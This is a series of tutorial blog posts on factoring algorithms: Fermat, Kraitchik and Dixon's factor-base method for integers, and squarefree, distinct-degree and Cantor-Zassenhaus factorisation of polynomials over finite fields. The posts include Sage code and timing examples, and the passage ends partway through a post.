Before implementing the algorithm, however, we need a quick word about the last part: given (at least) $d+1$ vectors of $\mathbf{F}_2^d$, how exactly do we find a linear dependence? We create a $d+1\times d$ matrix with our vectors as rows, which, using the example of the previous post, gives

\[ M = \begin{pmatrix}

1 & 1 & 0 & 1 \\

0 & 0 & 1 & 0 \\

1 & 1 & 0 & 1 \\

1 & 1 & 1 & 1 \\

1 & 1 & 1 & 1

\end{pmatrix}. \]

This is a $5\times 4$ matrix, which induces by left multiplication ($f: \mathbf{x}\mapsto \mathbf{x}M$) a linear transformation from $\mathbf{F}_2^5$ to $\mathbf{F}_2^4$. Now it is easy to see that each vector of the kernel of $f$ corresponds to a set of rows which add to the zero vector, for example the vector $(1, 0, 1, 0, 0) \in \ker f$ corresponds to the set of rows we used earlier.

Thus in the end we just need to obtain the vectors of the kernel of $f$ in order to find our congruences. Fortunately, we need go no further: matrices in Sage have a method for that, and since linear algebra is not our topic here, we will happily use it without caring about how it works. (And actually, we will also freely use is_prime() since primality testing, which is a completely different thing from factoring, is not our topic either.)

This can be implemented as follows. We first need a trial factoring function to weed out small factors, because our algorithm does not like them very much. It is pretty straightforward:

# Trial divide for prime factors in primes. # Returns the factors found and the unfactored part. def trial(n, primes): factors = [] for p in primes: e = 0 while n % p == 0: e = e + 1 n = n // p if e > 0: factors.append((p, e)) if n == 1: break return (Factorization(factors), n)

We also need a function to recognise smooth numbers:

# If smooth (i.e., all prime factors in fbase), returns the exponent vector. # Otherwise, returns None. def is_smooth(n, fbase): lfbase = len(fbase) v = vector(GF(2), lfbase + 1) for i in range(lfbase): while n % fbase[i] == 0: v[i+1] = v[i+1] + 1 n = n // fbase[i] if n < 0: v[0] = 1 n = -n if n == 1: return v else: return None

The main part of the algorithm:

# Returns a non-trivial factor. def dixonfact(n, primes): b = ceil(exp((1/2)*sqrt(log(n)*log(log(n))))) fbase = [p for p in primes if p < b] d = len(fbase) + 1 Tx = [] TQx = [] vectors = [] nvalues = 0 # Search for enough suitable vectors x = ceil(sqrt(n)) v = is_smooth(x^2 - n, fbase) if v is not None: Tx.append(x) TQx.append(x^2 - n) vectors.append(v) nvalues = nvalues + 1 k = 1 while nvalues < d+5: v = is_smooth((x+k)^2 - n, fbase) if v is not None: Tx.append(x+k) TQx.append((x+k)^2 - n) vectors.append(v) nvalues = nvalues + 1 v = is_smooth((x-k)^2 - n, fbase) if v is not None: Tx.append(x-k) TQx.append((x-k)^2 - n) vectors.append(v) nvalues = nvalues + 1 k = k+1 # Get relations M = matrix(vectors) for v in M.kernel(): if v == 0: continue x = 1 y2 = 1 for i in range(nvalues): x = x * Tx[i]^(v[i]) y2 = y2 * TQx[i]^(v[i]) y = sqrt(y2) if (x+y) % n != 0 and (x-y) % n != 0: return gcd(x+y, n)

And finally the main factoring function, which puts everything together. We also treat as a special case the case where $n$ is a prime power (there is a special algorithm to handle such numbers, which is both simple and efficient, but we omit it for simplicity):

# Full factorisation. # If init, we generate the list of primes and do # trial division with them. def dixon(n, primes=None, init=True): # Special cases if is_prime_power(n): return factor(n) if n == 1: return Factorization([]) if init: b = ceil(exp((1/2)*sqrt(log(n)*log(log(n))))) primes = prime_range(b) F, n = trial(n, primes) return Factorization(list(F) + list(dixon(n, primes, False))) # We know that n is not a prime power and not 1. d = dixonfact(n, primes) return Factorization(list(dixon(d, primes, False)) + list(dixon(n//d, primes, False)))

In order to test that it works correctly, we can use a test function like this:

# Test on n random integers from 1 to b (inclusive). def testdixon(n, b): for i in range(n): t = cputime() N = 1 + ZZ.random_element(b) print "[%s/%s] Factoring %s = %s..." % (i+1, n, N, factor(N)) myfactor = dixon(N) if list(myfactor) != list(factor(N)): print "Failed on %s" % N return False print "Factored in %s seconds." % cputime(t) print "All passed." return True

but it is most meaningful to test it on a *semiprime* (*i.e.*, a product of two distinct primes), since this is normally the most difficult case. For example:

sage: n = 21337797057980567893 sage: t = cputime() sage: factor(n) 2975772091 * 7170507823 sage: cputime(t) 0.029450000000000198 sage: t = cputime() sage: dixon(n) 2975772091 * 7170507823 sage: cputime(t) 78.717072 sage: t = cputime() sage: trial(n, prime_range(ceil(sqrt(n)))) (2975772091, 7170507823) sage: cputime(t) 298.628159

As said at the beginning of this post, our algorithm is significantly faster than trial division, but also significantly slower than Sage's factor(), meaning that there is still room for improvement. It is not difficult to convince ourselves that the slowest part is in the is_smooth() function, to identify smooth numbers, so this is where we will concentrate our efforts from now on.

]]>

Say we now wish to factor $n = 2587$. The values of $x^2-n$ for various values of $x$ are as follows:

\[ \begin{array}{c | l}

x & x^2-n \\

\hline

51 & 14 \\

52 & 117 \\

53 & 222 \\

61 & 1134 \\

62 & 1257 \\

63 & 1382

\end{array} \]

Kraitchik noticed that some of those numbers factor very easily even using trial division: we have $14 = 2\times 7$ of course, but also $1134 = 2\times 3^4\times 7$. This at once gives us the desired square:

\[ \begin{align*}

14 \times 1134

&= 2\times 7\times 2\times 3^4\times 7 \\

&= 2^2\times 3^4\times 7^2 \\

&= \left(2\times 3^2\times 7\right)^2 \\

&= 126^2,

\end{align*} \]

and thus the congruence $(51\times 61)^2 \equiv 126^2 \pmod n$. We are lucky: neither of $51\times 61 \pm 126$ is a multiple of $n$, and we obtain the non-trivial divisors $\gcd(51\times 61+126, n) = 13$ and $\gcd(51\times 61-126, n) = 199$ of $n$.

The above method is still very much imprecise. It was formalised by Brillhart and Morrison in 1975 in an article in which they also presented a factorisation of the seventh Fermat number $F_7 = 2^{2^7} – 1$ which they had obtained using their new method. Somewhat surprisingly, it is basically just linear algebra.

What we did above was find values $x^2-n$ which had only “small” prime factors. The first thing we need to do is to define “small”, which we do in a straghtforward way: we say that a number has only “small” prime factors if all its prime factors are smaller than a given upper bound $B$ (such numbers are called “$B$-smooth”). We will see later that choosing a suitable $B$ is not completely straightforward, but for now we will be content with $B=7$. So we do as above until we find numbers whose only prime factors are $2$, $3$, $5$, or $7$ (the set $\{2,3,5,7\}$ is then what Brillhart and Morrison call the *factor base*). Let us try now with $n = 3439$, we find

\[ \begin{array}{c | l}

x & x^2-n \\

\hline

59 & 42 = 2\times 3\times 7 \\

62 & 405 = 3^4\times 5 \\

67 & 1050 = 2\times 3\times 5^2\times 7 \\

73 & 1890 = 2\times 3^3\times 5\times 7 \\

143 & 17010 = 2\times 3^5\times 5\times 7

\end{array} \]

We define for each of those values its *exponent vector* in a natural way:

\[ \begin{align*}

v(42) &= (1, 1, 0, 1), \\

v(405) &= (0, 4, 1, 0), \\

v(1050) &= (1, 1, 2, 1), \\

v(1890) &= (1, 3, 1, 1), \\

v(17010) &= (1, 5, 1, 1),

\end{align*} \]

and we note that the exponent vector of the product of two values will be the sum of their exponent vectors. We want a product which is a square, and it is clear that a number is a square if and only if all the entries of its exponent vector are even. Thus we are only interested in the parity of the entries of exponent vectors, and not in their precise value, and it seems a good idea to reduce them modulo $2$ to discard the superfluous information. The vectors become

\[ \begin{align*}

v(42) &= (1, 1, 0, 1), \\

v(405) &= (0, 0, 1, 0), \\

v(1050) &= (1, 1, 0, 1), \\

v(1890) &= (1, 1, 1, 1), \\

v(17010) &= (1, 1, 1, 1),

\end{align*} \]

and, seeing them now as vectors with coordinates in $\mathbf{F}_2$, we wish to obtain a set of vectors whose sum is the zero vector. In other words, which are linearly dependent.

Here we are lucky because we have plenty of choices, including two very obvious pairs of equal vectors. We can for example use the congruence

\[ \begin{align*}

3953^2

&\equiv (59\times 67)^2 \\

&\equiv 42\times 1050 \\

&\equiv 2\times 3\times 7\times 2\times 3\times 5^2\times 7 \\

&\equiv 2^2\times 3^2\times 5^2\times 7^2 \\

&\equiv \left(2\times 3\times 5\times 7\right)^2 \\

&\equiv 210^2\pmod n,

\end{align*} \]

and since none of $3953\pm 210$ is a multiple of $n$, we obtain the non-trivial divisors $\gcd(3953-210, n) = 19$ and $\gcd(3953+210, n) = 181$.

The strength of this method, however, comes from its systematicity. If the factor base is much larger than in our example, it might be difficult to spot sets of linearly dependent vectors, and in any case, we cannot just tell a computer to look and find them. However, if we let $d$ be the number of primes in our factor base, our exponent vectors will be vectors of the vector space $\mathbf{F}_2^d$, and since this vector space has dimension $d$, linear algebra tells us that we need only find at most $d+1$ vectors in order to be certain to find a linear dependence.

Also, remember that even if we find a set of linearly dependent vectors, which gives a congruence $x^2\equiv y^2\pmod n$, the game is not necessarily over. We also require that $x\not\equiv \pm y\pmod n$, and so we might need to find several congruences (and thus, several set of linearly dependent vectors) until we find a satisfactory one. Linear algebra helps us here also: if we have gathered a large number of vectors, we have good algorithms from linear algebra which will help us find subsets of linearly dependent vectors.

This is not easy. If we choose it small, $B$-smooth numbers will be very rare, and we will thus need to try a large amount of values until we find enough numbers with good exponent vectors. On the other hand, if we choose it large, $B$-smooth numbers will be more difficult to identify (since we will need to factor them up to a larger bound), and we will also need more of them (since we need at least as many as there are primes in our factor base, plus one).

Rigorously finding an ideal value of $B$ involves complicated analytic number theory. Two important ideas are that it is better to choose it too large than too small, and also that the ideal value is about $\exp\left(\frac{1}{2}\sqrt{\log n \log\log n}\right)$.

So far, we have only computed $x^2-n$ for $x > \sqrt{n}$, so we always had $x^2-n > 0$. There seems to be no reason to restrict ourselves to positive values. Indeed, continuing with the example $n = 3439$, we find

\[ \begin{array}{c | l}

x & x^2-n \\

\hline

58 & -75 = (-1)\times 3\times 5^2 \\

53 & -630 = (-1)\times 2\times 3^2\times 5\times 7 \\

52 & -735 = (-1)\times 3\times 5\times 7^2 \\

46 & -1323 = (-1)\times 3^3\times 7^2

\end{array} \]

which gives

\[ \begin{align*}

2668^2

&\equiv (58\times 46)^2 \\

&\equiv (-75)\times (-1323) \\

&\equiv (-1)\times 3\times 5^2\times (-1)\times 3^3\times 7^2 \\

&\equiv (-1)^2\times 3^4\times 5^2\times 7^2 \\

&\equiv \left(3^2\times 5\times 7\right)^2 \\

&\equiv 315^2\pmod n,

\end{align*} \]

which gives the non-trivial divisors $\gcd(2668+315, n) = 19$ and $\gcd(2668-315, n) = 181$.

So using negative values seems to work just fine, and actually it has an advantage. As $x$ goes farther away from $\sqrt{n}$, $x^2-n$ goes farther away from $0$, and obviously, the larger an integer is in absolute value, the smaller the probability that it will be smooth. If we use only positive values of $x^2-n$, after a while it will be so large that it will almost never be smooth. On the other hand, if we also use negative values, we will have twice as much values of $x^2-n$ in the same range of absolute value, and thus twice as much chance to find smooth ones.

For this benefit, using negative values has negligible cost: we just add the “prime” $-1$ to our factor base. This does not change the idea of the method, because since a square is always positive, we will also need the exponent of $-1$ to be even, just like that of the other primes. The cost is that since we have one more element in our factor base, we will need to find one more vector if we want to be certain to find a linear dependence. Since in exchange we will obtain twice as many vectors to choose from, this is quite a bargain.

This post is getting long, so we’ll get coding in the next one. We will see Dixon’s algorithm, which is the straightforward implementation of the ideas we have discussed so far, and was introduced by Dixon in 1981. This seems odd, because we have said that Brillhart and Morrison introduced the factor base method in 1975. In fact, they originally applied their method to a different algorithm, which used continued fractions instead of the polynomial $x^2-n$, and was the leading algorithm at the time. Since continued fractions are not very pretty and the continued fractions algorithm is no longer used today, we do not discuss it here.

]]>Some integers with no obvious small divisor, such as for example $8051$, are nonetheless easily factored on paper. One need only notice that

\[ 8051 = 8100-49 = 90^2 – 7^2, \]

and use the well-known identity $a^2-b^2 = (a+b)(a-b)$ to find that $8051 = 83\times 97$.

This method of factoring an integer by writing it as a difference of two squares is generally attributed to Fermat. However, although it is always possible to write an odd composite as a difference of two squares (as $ab = \left(\frac{a+b}{2}\right)^2-\left(\frac{a-b}{2}\right)^2$), this method by itself makes for a lousy factoring algorithm. We can implement it in Sage like this:

def fermat(n): x = ceil(sqrt(n)) while not is_square(x^2-n): x = x+1 y = sqrt(x^2-n) return (x+y, x-y)

but this algorithm will work only if $n$ has a divisor near its square root, which most numbers do not. On the other hand, the naive factoring algorithm by trial division will work on numbers which have one relatively small factor, which most numers do, so this algorithm is most often even worse than trial division. However, the most powerful factoring algorithms today are refinements of this simple idea.

The first one was popularised by Kraitchik in the 1920s (although the idea was known at least since Gauss). Instead of looking for integers $x$ and $y$ such that $x^2-y^2$ equals $n$, we ask only that $x^2-y^2$ be a multiple of $n$. Thus, $(x+y)(x-y)$ will be a multiple of $n$, and if it also happens that neither of $x+y$ and $x-y$ is a multiple of $n$, it means that the factors of $n$ are “split” between $x+y$ and $x-y$, and finally that $\gcd(n, x\pm y)$ will be non-trivial divisors of $n$. This gives for example the following algorithm:

def kraitchik(n): x = ceil(sqrt(n)) while True: k = 1 while x^2 - k*n >= 0: if is_square(x^2-k*n): y = sqrt(x^2-k*n) if (x+y) % n != 0 and (x-y) % n != 0: a = gcd(x+y, n) b = gcd(x-y, n) return (a, b, n//(a*b)) k = k+1 x = x+1

which, albeit an improvement over the preceeding one, is still not at all practical.

In fact, Kraitchik does something else. Instead of trying $x^2-kn$ for various values of $x$ and $k$ until a square is found, he keeps the value $x^2-n$ of the previous Fermat method. However, instead of trying individual values to see if one of them is a square, he keeps the previous values and tries to find a product of such values which is a square. Say we have values $x_1, x_2, \dots, x_k$ such that $\prod \left(x_i^2 – n\right) = y^2$. Since obviously $x_i^2-n \equiv x_i^2 \pmod n$, we obtain that

\[ y^2 \equiv \prod \left(x_i^2-n\right) \equiv \prod x_i^2 \equiv \left(\prod x_i\right)^2 \pmod n, \]

and voilà our congruence of squares.

The problem, now, is how to find our values $x_1,\dots,x_k$ which produce a square. Kraitchik used only trial and error, which is obviously not very suitable for an algorithm. A systematic method for this was not introduced until the 1970s. I will cover it in a coming post.

]]>We are left with the following problem: given a polynomial $A \in \mathbf{F}_p[X]$ which is known to be squarefree and the product of irreducible factors which are all of degree $d$, find these factors. One algorithm to do this was introduced by Cantor and Zassenhaus in 1981.

We may assume that $A$ has at least two factors (if it has only one, it is already irreducible, so we have nothing to do). We also assume $p > 2$ for now. Then for any $T \in \mathbf{F}_p[X]$, we have the following equality:

\[ A = \gcd(A,T)\times \gcd(A,T^{(p^d-1)/2}+1)\times \gcd(A,T^{(p^d-1)/2}-1). \]

This is easy to see: since all the elements of $\mathbf{F}_{p^d}$ are roots of $X^{p^d}-X$ and since $T \in \mathbf{F}_p[X]$, we have that for any $x \in \mathbf{F}_{p^d}$, $T(x) \in \mathbf{F}_{p^d}$ is again a root of $X^{p^d}-X$, and so $x$ is a root of $T^{p^d}-T$. Thus $X^{p^d}-X$ divides $T^{p^d}-T$. This means that every monic irreducible polynomial of degree $d$ divides $T^{p^d}-T$, and so in the end $A$ divides $T^{p^d}-T$, since $A$ is squarefree. Finally, we clearly have the equality

\[ T^{p^d}-T = T(T^{(p^d-1)/2}+1)(T^{(p^d-1)/2}-1), \]

and since those three factors are pairwise relatively prime, the equality follows.

Let now $T$ be monic of degree $e \le 2d-1$. According to the above equality, the common factors of $A$ and $T^{p^d}-T$, which are just the factors of $A$ since $A$ divides $T^{p^d}-T$, are “spread” among the three polynomials $T$, $T^{(p^d-1)/2}+1$, and $T^{(p^d-1)/2}-1$. It seems reasonable to expect that each of the second and third factors will contain about half of them, since the degree of $T^{(p^d-1)/2}\pm 1$ is about half that of $T^{p^d}-T$. Indeed, one can show that if $T$ is chosen at random, the probability that $T^{(p^d-1)/2}-1$ contains at least one, but not all, of the common factors of $A$ and $T^{p^d}-T$ (and so, that $\gcd(A,T^{(p^d-1)/2}-1)$ is a non-trivial factor of $A$) is more than $4/9$.

We will thus normally not have to try too many different $T$s in order to obtain a non-trivial factor $U$, and we can then apply the algorithm recursively to $U$ and $A/U$. We obtain

def czodd(A, d): if A.degree() == d: return [A] p = A.base_ring().characteristic() while True: T = parent(A).random_element((1, 2*d-1)) if T.degree() < 1: continue T = T.monic() U = gcd(A, T^((p^d-1)//2)-1) if U.degree() > 0 and U.degree() < A.degree(): return czodd(U, d) + czodd(A//U, d)

This works as expected:

sage: R.<x> = PolynomialRing(GF(5)) sage: czodd( (x+1)*(x+2)*(x+3)*(x+4), 1) [x + 2, x + 1, x + 3, x + 4] sage: czodd( (x^2+x+1)*(x^2+2), 2) [x^2 + 2, x^2 + x + 1]

However, this naive algorithm has the same problem as the one for distinct degree factorisation: we have to manipulate a polynomial ($T^{(p^d-1)/2}-1$) whose degree grows exponentially with $d$, and this slows down our algorithm a lot: it takes several seconds to factor a polynomial with two irreducible factors of degree $8$, when Sage's factor() again takes less than a tenth of a second:

sage: f x^16 + 2*x^13 + x^12 + 4*x^11 + 2*x^10 + x^9 + 3*x^7 + 4*x^6 + 2*x^5 + 2*x^4 + x^3 + 3*x^2 + 2 sage: t = cputime() sage: factor(f) (x^8 + x^7 + 2*x^6 + 3*x^4 + 3*x^3 + x^2 + x + 1) * (x^8 + 4*x^7 + 4*x^6 + 4*x^3 + 3*x^2 + 3*x + 2) sage: cputime(t) 0.01883699999999955 sage: t = cputime() sage: czodd(f, 8) [x^8 + 4*x^7 + 4*x^6 + 4*x^3 + 3*x^2 + 3*x + 2, x^8 + x^7 + 2*x^6 + 3*x^4 + 3*x^3 + x^2 + x + 1] sage: cputime(t) 2.0217479999999988

Again, we are not interested in $T^{(p^d-1)/2}-1$ itself, only in its GCD with $A$, and since $A$ is of much smaller degree, we work modulo $A$. This time, however, we need to explicitly construct the ring $\mathbf{F}_p[X]/(A)$ and compute $T^{(p^d-1)/2}-1$ in it (in the previous case, we could just reduce modulo $A$ on the fly). This gives:

def czodd(A, d): if A.degree() == d: return [A] R = parent(A) RmodA = R.quotient_by_principal_ideal(A) p = R.characteristic() while True: T = parent(A).random_element((1, 2*d-1)) if T.degree() < 1: continue T = RmodA(T.monic()) U = gcd(A, lift(T^((p^d-1)//2))-1) if U.degree() > 0 and U.degree() < A.degree(): return czodd(U, d) + czodd(A//U, d)

which works much better:

sage: t = cputime() sage: czodd(f, 8) [x^8 + 4*x^7 + 4*x^6 + 4*x^3 + 3*x^2 + 3*x + 2, x^8 + x^7 + 2*x^6 + 3*x^4 + 3*x^3 + x^2 + x + 1] sage: cputime(t) 0.036122999999999905

The algorithm for splitting in odd characteristic is based on the fact that for any $T \in \mathbf{F}_p[X]$ we have

\[ A = \gcd(A,T)\times \gcd(A,T^{(p^d-1)/2}+1)\times \gcd(A,T^{(p^d-1)/2}-1), \]

and that if $T$ is chosen at random with sufficiently small degree, then there is a good chance that the second and third GCDs each will contain about half of the factors of $A$, and will thus be non-trivial divisors of $A$. This fails in characteristic $2$ because then $T^{(p^d-1)/2}+1 = T^{(p^d-1)/2}-1$, and so the equality becomes

\[ A = \gcd(A,T)\times \gcd(A, T^{p^d-1}-1), \]

which is useless because then it is almost certain that *all* the factors of $A$ will be in the second GCD, which means that the equality will just give us the trivial factorisation $A = 1\times A$.

What can we do then? For a polynomial $T \in \mathbf{F}_2[X]$, consider

\[ W = T + T^2 + T^4 + \dots + T^{2^{d-1}}. \]

Then we have

\[ A = \gcd(A, W)\times \gcd(A, W + 1). \]

This is easy to see, we have

\[ W^2 = T^2 + T^4 + T^8 + \dots + T^{2^d} \]

(remember that we are in characteristic $2$), and so

\[ W\times (W+1) = W^2+W = T^{2^d}+T, \]

and the same argument as in odd characteristic shows that $A$ divides $T^{2^d}-T$, and the asserted equality follows. Since obviously $W$ and $W+1$ have the same degree, with good probability they will each contain about half of the common factors of $A$ and $T^{2^d}-T$, and $\gcd(A,W)$ will give a non-trivial divisor of $A$. We obtain the following algorithm:

def cz2(A, d): if A.degree() == d: return [A] R = parent(A) while True: T = R.random_element((1, 2*d-1)) if T.degree() < 1: continue W = T for i in range(d-1): T = T^2 % A W = W + T U = gcd(A, W) if U.degree() > 0 and U.degree() < A.degree(): return cz2(U, d) + cz2(A//U, d)

which works as expected:

sage: R.= PolynomialRing(GF(2)) sage: A = x^16 + x^14 + x^10 + x^5 + x^3 + x + 1 sage: t = cputime() sage: factor(A) (x^8 + x^4 + x^3 + x^2 + 1) * (x^8 + x^6 + x^4 + x^3 + x^2 + x + 1) sage: cputime(t) 0.03154299999999921 sage: t = cputime() sage: cz2(A,8) [x^8 + x^6 + x^4 + x^3 + x^2 + x + 1, x^8 + x^4 + x^3 + x^2 + 1] sage: cputime(t) 0.023383000000002596

We can combine the three previous algorithms to obtain a full factorisation algorithm in $\mathbf{F}_p[X]$:

def polfactor(A): if A.base_ring().characteristic() == 2: cz = cz2 else: cz = czodd factors = [] for P, e in sqfreefact(A): for q, d in ddfact(P): for r in cz(q, d): factors.append((r, e)) return factors

We can test it for example like this:

def testfactor(p, pmax, n, d): if p is None: R.<x> = PolynomialRing(GF(random_prime(pmax))) else: R.<x> = PolynomialRing(GF(p)) for i in range(n): A = R.random_element(d) while A.degree() < 1: A = R.random_element(d) A = A.monic() if set(polfactor(A)) != set(factor(A)): print "Failed on %s" % A return False return True

to check that our function returns the same factorisation as Sage's factor() function on random polynomials. It seems to work:

sage: testfactor(2, None, 100, 100) True sage: testfactor(None, 50, 100, 100) True]]>

We now have our squarefree polynomial $A_i$, which is the product of all the factors of $A$ with exponent $i$. Our goal is to factor it into $A_i = A_{i,1}A_{i,2}\dots A_{i,\ell}$, where $A_{i,d}$ is the product of all the factors of $A_i$ of degree $d$. This is much simpler than the squarefree factorisation algorithm; it is essentially based on the fact that, over a field $\mathbf{F}_p$, the irreducible factors of $X^{p^n}-X$ are precisely the (monic) irreducible polynomials whose degree is a divisor of $n$.

To ease notation, let $q = p^n$. We first show that all the monic irreducible polynomials of degree $n$ are factors of $X^q-X$. So as to not lengthen our exposition, we will use without proof the fact that there is a field with $q$ elements, say $K$. Now, the multiplicative group $K^\times$ has order $q-1$, meaning that for every element $a \in K^\times$ we have $a^{q-1} = 1$, and so $a^q = a$. Since also $0^q = 0$, we see that all the elements of $K$ are roots of $X^q-X$, and since it cannot have more than $q$ roots, they are all its roots and we have the factorisation

\[ X^q-X = \prod_{a \in K} (X-a). \]

Let now $P \in \mathbf{F}_p[X]$ be monic and irreducible of degree $n$. We know that there exists an extension of $\mathbf{F}_p$ in which $P$ has a root, say $\alpha$. The field $\mathbf{F}_p(\alpha)$ has $q$ elements, and since $\alpha$ is in $\mathbf{F}_p(\alpha)$ we have $\alpha^q = \alpha$. This means that $\alpha$ is a root of $X^q-X$, which in turn means that $X^q-X$ is a multiple of the minimal polynomial of $\alpha$. Since this minimal polynomial is $P$, this proves that $P$ is a factor of $X^q-X$, as desired.

We have shown that all the monic irreducible polynomials of degree $n$ are factors of $X^q-X$, and we now look for the others. Let $P \in \mathbf{F}_p[X]$ be an irreducible factor of $X^q-X$. Since $X^q-X$ has all its roots in $K$, $P$ must have all its roots in $K$ also. Let then $\alpha$ be a root of $P$ in $K$. We have $\mathbf{F}_p \subseteq \mathbf{F}_p(\alpha) \subseteq K$, with $[\mathbf{F}_p(\alpha):\mathbf{F}_p]$ being the degree of $P$. Since we also know that $[K:\mathbf{F}_p] = [K:\mathbf{F}_p(\alpha)]\times [\mathbf{F}_p(\alpha):\mathbf{F}_p] = n$, this shows that the degree of $P$ is a divisor of $n$.

Finally, let $d$ be a divisor of $n$ and $P$ be irreducible of degree $d$. Using again our previous result, we see that $P$ is a factor of $X^{p^d}-X$. Now, since $d$ divides $n$, we have that $p^d-1$ divides $p^n-1$, and so that $X^{p^d-1}-1$ divides $X^{p^n-1}-1$. Finally, $X^{p^d}-X$ divides $X^{p^n}-X$, and so since $P$ is a factor of $X^{p^d}-X$, it is a factor of $X^q-X$.

So, given a polynomial $A$, which we can assume squarefree, we know that the factors of $A$ of degree $d$ are precisely those who are also factors of $X^{p^d}-X$, but not of $X^{p^e}-X$ for any $e < d$. This leads to the following algorithm (again, discarding unit factors):

def ddfact(A): p = A.base_ring().characteristic() x = A.variables()[0] factors = [] P = x^p d = 1 while A.degree() > 0: T = gcd(P-x, A) if T != 1: factors.append((T, d)) A = A//T d = d+1 P = P^p return factors

which works as expected:

sage: f = (x+1)*(x+2)*(x^2+x+1)*(x^2+x+2) sage: ddfact(f) [(x^2 + 3*x + 2, 1), (x^4 + 2*x^3 + 4*x^2 + 3*x + 2, 2)] sage: (x+1)*(x+2) x^2 + 3*x + 2 sage: (x^2+x+1)*(x^2+x+2) x^4 + 2*x^3 + 4*x^2 + 3*x + 2

This works, but it is also very slow. For example on a polynomial of degree $20$:

sage: f = x^20 + 3*x^19 + 4*x^18 + 4*x^17 + x^16 + 3*x^15 + 2*x^14 + 2*x^13 + 3*x^12 + x^11 + 2*x^10 + 2*x^7 + 4*x^6 + 2*x^5 + 3*x^4 + 3*x^3 + x^2 + x + 2 sage: is_squarefree(f) True sage: t = cputime() sage: ddfact(f) [(x^2 + 2*x + 3, 2), (x^4 + 4*x^2 + 2, 4), (x^6 + 3*x^5 + 4*x^4 + 4*x^2 + x + 1, 6), (x^8 + 3*x^7 + 2*x^6 + x^5 + x^4 + 2*x^2 + x + 2, 8)] sage: cputime(t) 1.932749000000058

it takes almost 2 seconds just for the distinct degree factorisation. For comparison, Sage’s factor() function on the same polynomial takes less than a tenth of a second for the complete factorisation:

sage: t = cputime() sage: factor(f) (x^2 + 2*x + 3) * (x^4 + 4*x^2 + 2) * (x^6 + 3*x^5 + 4*x^4 + 4*x^2 + x + 1) * (x^8 + 3*x^7 + 2*x^6 + x^5 + x^4 + 2*x^2 + x + 2) sage: cputime(t) 0.02367099999992206

It is not difficult to identify the bottleneck: in order to compute the product of the irreducible factors of degree $d$, we take the GCD of $A$ and $X^{p^d}-X$. This means that we need to manipulate a polynomial ($X^{p^d}-X$) whose degree grows exponentially in $d$. In the previous example, the largest factor has degree $8$, which means $X^{p^d}-X$ will have degre $5^8 \approx 400,000$. This is clearly unacceptable.

It is also very simple to fix this problem. We are not really interested in $X^{p^d}-X$ itself, only in its common factors with $A$. It is easy to see that if $P$ is a common factor of $X^{p^d}-X$ and $A$, it will also be a factor of $X^{p^d}-X \mod A$ (the remainder of $X^{p^d}-X$ when divided by $A$), and conversely. In other words, we use the well-known result that $\gcd(A,B) = \gcd(A,B\mod A)$. the algorithm becomes

def ddfact(A): p = A.base_ring().characteristic() x = A.variables()[0] factors = [] P = x^p d = 1 while A.degree() > 0: T = gcd(P-x, A) if T != 1: factors.append((T, d)) A = A//T d = d+1 P = P^p % A return factors

which is much better:

sage: t = cputime() sage: ddfact(f) [(x^2 + 2*x + 3, 2), (x^4 + 4*x^2 + 2, 4), (x^6 + 3*x^5 + 4*x^4 + 4*x^2 + x + 1, 6), (x^8 + 3*x^7 + 2*x^6 + x^5 + x^4 + 2*x^2 + x + 2, 8)] sage: cputime(t) 0.031130999999959386]]>

We wish to factor a polynomial $A$ with coefficients in the finite field $\mathbf{F}_p$ where $p$ is prime. As we stated in the previous post, the first step is to obtain a *squarefree factorisation* of $A$. Namely, we wish to obtain polynomials $A_1,A_2,\dots,A_k$, which are all squarefree and relatively prime, and such that $A = A_1A_2^2\dots A_k^k$. Ultimately, $A_i$ will be precisely the product of all the irreducible factors of $A$ with exponent $i$, which will ensure that all the above conditions are satisfied. We first need some preliminary results.

It is well-known from calculus that the derivative of $X^n$ is $nX^{n-1}$, and that the derivative is linear in respect to addition of functions and multiplication by a scalar. This allows us to define the derivative of the polynomial $A = \sum_{i=0}^n a_iX^i$ as $A’ = \sum_{i=1}^n ia_iX^{i-1}$. In calculus, the derivative was defined using limits, distances and suchlike. We cannot use this definition when working over a finite field, because we cannot define the distance between two elements in a sensible way. However, the final expression of the derivative of a polynomial still makes sense over a finite field (or any ring, for that matter), since it involves only the basic ring operations of addition and multiplication.

So we just define the derivative of a polynomial with coefficients in $\mathbf{F}_p$ as in the expression above. Our derivative still has the familiar properties:

**Linearity:**for all $f,g \in \mathbf{F}_p[X]$ and $a \in \mathbf{F}_p$, we have $(f+g)’ = f’+g’$, and $(af)’ = af’$.**Product rule:**for all $f,g \in \mathbf{F}_p[X]$, we have $(fg)’ = f’g + fg’$. This formula generalises by induction to any number of factors:

\[ \left( \prod_i f_i \right)’ = \sum_i \left( f_i’ \prod_{j \ne i} f_j \right). \]**Power rule:**for all $f \in \mathbf{F}_p[X]$ and integers $n > 0$, we have $(f^n)’ = nf’f^{n-1}$.

To better grasp the idea of the squarefree factorisation algorithm, it is worthwhile to first consider the simpler case of a ring of characteristic $0$, such as $\mathbf{Z}$. The key is to consider the GCD of $A$ and $A’$. The reader might be aware from study of polynomials over $\mathbf{R}$ that in that case, a factor $P$ of $A$ is also a factor of $A’$ if and only if its exponent (in the decomposition of $A$) is more than $1$. This remains true in general over any ring of characteristic $0$.

More precisely, if $A = \prod P_i^{e_i}$, then $A’ = Q\prod P_i^{e_i-1}$, where none of the $P_i$ divide $Q$. We thus obtain finally that $T = \gcd(A,A’) = \prod P_i^{e_i-1}$; in other words, $T$ is the polynomial whose decomposition is the same as $A$, but with all exponents decreased by $1$. In particular, this means that all the factors of $A$ which had exponent $1$ have disappeared and are not factors of $T$. This means that we know how to obtain the factors of exponent $1$ (which constitute $A_1$ in our squarefree factorisation): we must “isolate” all the factors which are in $A$ but not in $T$.

We thus compute $V = A/T = \prod P_i$, which is the product of all factors of $A$, but each with exponent $1$, and $V_2 = \gcd(T,V)$, which is the product of all factors of $A$ which are also in $T$ (*i.e.*, which have exponent more than $1$ in $A$). Since we want the factors which are *not* in $T$, we obtain finally $A_1 = V/V_2$. If we then let $T_2 = T/V_2$, this is the polynomial whose decomposition is the same as $A$, but with all exponents decreased by $2$, and so $A_2$ is the product of factors which are in $T$ but not in $T_2$. Continuing this process until $V_k$ is constant (which means all the factors have been accounted for), we obtain the following algorithm (in Sage):

def sqfreefactz(A): factors = [] T = gcd(A, A.derivative()) k = 1 Tk = T Vk = A//T while Vk.degree() > 0: Vkplus1 = gcd(Tk, Vk) Tkplus1 = Tk//Vkplus1 factors.append((Vk//Vkplus1, k)) k = k+1 Vk = Vkplus1 Tk = Tkplus1 return factors

which works as expected:

